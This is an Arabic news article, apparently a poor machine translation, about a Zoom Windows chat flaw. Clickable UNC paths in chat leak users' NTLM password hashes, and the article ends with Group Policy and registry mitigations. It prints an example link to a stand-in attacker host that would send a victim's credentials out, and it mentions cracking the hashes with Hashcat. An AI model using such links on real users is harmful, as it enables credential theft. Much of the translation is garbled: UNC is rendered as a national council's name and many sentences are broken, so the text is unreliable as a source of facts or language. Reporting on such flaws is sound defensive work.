في الآونة الأخيرة، عملاء Windows الطبعة تكبير عرضة للاختراقات أمنية اندلعت هجمات حقن مسار مجلس التوحيد الوطنى. كما الصوت والفيديو وتطبيقات عقد المؤتمرات، وتكبير واجهة دردشة يسمح أيضا للمستخدمين التواصل مع بعضهم البعض عن طريق إرسال رسالة نصية. ومع ذلك، أشار وسائل الاعلام الاجنبية Bleeping الحاسوب إلى أن مهاجم يمكن استغلال الثغرة الأمنية دردشة وحدة، والضغط على الرابط ذي الصلة سرقة بيانات تسجيل الدخول ويندوز الخاص بالمستخدم.

حقن [مثال] UNC

عند إرسال رسالة دردشة لجميع URL سيتم إرسالها من خلال التحول إلى الأعضاء الآخرين في مجموعة ضمن نقرة، ثم فتح الصفحة في المتصفح الافتراضي.

ومع ذلك، وجد الباحثون الأمن @ _g0dmode، وفعلا شبكة ويندوز UNC مسار، وتحويلها عملاء التكبير أيضا إلى وجود صلة للنقر رسالة الدردشة.

كما هو مبين، وURL التقليدية ومسار مجلس التوحيد الوطنى (\ evil.server.com \ صور \ cat.jpg)، وتحويلها إلى وجود صلة للنقر رسالة دردشة.

[NTLM التجزئة كلمة المرور اعتقلت]

إذا كان المستخدم بالنقر فوق وصلة إلى مسار UNC، سيحاول Windows استخدام بروتوكول مشاركة الملفات SMB للاتصال المواقع البعيدة، لفتح cat.jpg مسار الملف البعيد.

افتراضيا، يرسل Windows اسم المستخدم تسجيل الدخول وكلمة المرور NTLM التجزئة، ولكن أكثر المهاجم ذوي الخبرة يمكن عكس العملية لمساعدة أدوات مجانية Hashcat مثل.

[كلمات بسيطة يمكن أن يكون قوة الغاشمة خلال 16 ثواني]

الباحث الأمني ماثيو هيكي (@ HackerFantastic) قياس وجدت أنه يمكن حقن بنجاح التكبير، ويمكن الاستفادة من GPU على مستوى مدني الحالي وحدة المعالجة المركزية للقضاء بسرعة.

بالإضافة إلى نظام التشغيل Windows سرقة بيانات الدخول، وكشف هيكي أيضا إلى Bleeping الكمبيوتر، انقر على رابط بالمناسبة، ينطبق حقن UNC أيضا لبدء برنامج على الكمبيوتر المحلي (مثل أمر CMD موجه).

[ملاحظة] تشغيل

لحسن الحظ، ويندوز إصدار موجه ما اذا كان سيسمح ليتم تشغيله قبل تنفيذ البرنامج. تريد سد هذه الثغرة، يجب تكبير وقف عميل Windows ظائف UNC مسار التحويل (حجب جزء وصلات يمكن النقر عليها).

وتفيد التقارير أنه هيكي أن التكبير على مسؤول تويتر إرسال إعلام عن ثغرة أمنية، ولكن ليس من الواضح ما هي الإجراءات التي اتخذتها الشركة.

يمكن للعملاء الأمن واعية، و، قبل أن يتم الافراج عن التصحيح الرسمي، محدودة الاتصالات الصادرة نهج المجموعة NTLM إلى ملقم بعيد (يرجى الرجوع إلى العمليات التالية):

تكوين الكمبيوتر - >  إعدادات ويندوز - >  إعدادات الأمان - >  النهج المحلية - >  خيارات الأمان - >  أمن الشبكة: تقييد NTLM - >  أرسلت NTLM إلى ملقم الاتصالات عن بعد (وتكوين لرفض كل شيء).

لاحظ أنه إذا كان التكوين أعلاه نهج المجموعة على جهاز كمبيوتر وقد انضم المتعلقة بالمجال، قد تواجه مشاكل عند محاولة الوصول إلى المشاركة.

إذا لم يتم الترخيص لها للوصول إلى نهج المجموعة إعدادات ويندوز 10 مستخدمين الإصدار المنزلي يمكن أيضا استخدام محرر التسجيل لاستكمال القيود التشغيلية ذات الصلة (DWORD تكوين 2):

"RestrictSendingNTLMTraffic" = الكلمة المزدوجة: 00000002

لإنشاء هذا المفتاح بشكل صحيح، لمستخدمي ويندوز يتذكر كمسؤول لبدء تشغيل محرر التسجيل.

إذا كان من الضروري لاستعادة ويندوز السلوك الافتراضي من إرسال بيانات الاعتماد NTLM في المستقبل، ولكن أيضا ببساطة حذف مفتاح RestrictSendingNTLMTraffic المقابلة.